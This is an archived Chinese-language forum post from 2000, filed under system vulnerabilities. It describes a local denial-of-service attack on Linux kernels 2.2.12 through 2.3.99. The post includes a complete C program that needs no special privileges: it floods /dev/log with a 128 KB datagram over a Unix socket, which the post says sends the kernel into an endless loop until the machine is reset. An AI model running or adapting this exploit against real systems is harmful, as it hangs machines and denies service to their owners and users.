精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>本地用户对linux核心的D.o.S攻击

主题:本地用户对linux核心的D.o.S攻击
发信人: netcc()
整理人: williamlong(2000-07-07 09:59:21), 站内信件
下面的小程序将导致Linux 2.2.12 (默认案子的Red Hat 6.1)系统挂起,
在2.2.14 (最新稳定内核)和2.3.99-pre2 (最新内核),各种Pentium机器上测试
通过。
而且允许改程序无需任何特别权利。

这将导致系统核心进入死循环(直到你按下reset键)。


漏洞检测程序如下:

#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

char buf[128 * 1024];

int main ( int argc, char **argv )
{
    struct sockaddr SyslogAddr;
    int LogFile;
    int bufsize = sizeof(buf)-5;
    int i;

    for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';

SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_dat
a) );
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr)
);
return 0;
}

--
      我思念的城市已是黄昏
                          
      为何我总是对你一网情深!

※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 210.75.33.203]

[关闭][返回]